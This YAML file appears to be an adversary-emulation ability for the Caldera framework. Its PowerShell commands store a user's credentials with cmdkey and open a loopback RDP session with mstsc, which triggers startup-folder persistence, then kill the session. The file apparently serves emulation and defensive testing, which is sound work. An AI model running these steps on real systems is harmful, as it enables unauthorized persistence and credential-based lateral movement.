ability_id: 00446217-53ca-4749-bacd-f41fe189d36e
access: {}
additional_info: {}
buckets:
- lateral-movement
delete_payload: true
description: Sets credentials for a headless RDP session to spawn triggering startup
  folder persistence.
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: 'cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password};

    mstsc /v:127.0.0.2;

    sleep 10;

    Get-Process -name mstsc;

    if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;}'
  language: null
  name: psh
  parsers: []
  payloads: []
  platform: windows
  timeout: 60
  uploads: []
  variations: []
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: 'cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password};

    mstsc /v:127.0.0.2;

    sleep 10;

    Get-Process -name mstsc;

    if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;}'
  language: null
  name: pwsh
  parsers: []
  payloads: []
  platform: windows
  timeout: 60
  uploads: []
  variations: []
name: Startup Folder Persistence Execution
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: lateral-movement
technique_id: T1037.005
technique_name: 'Boot or Logon Initialization Scripts: Startup Items'
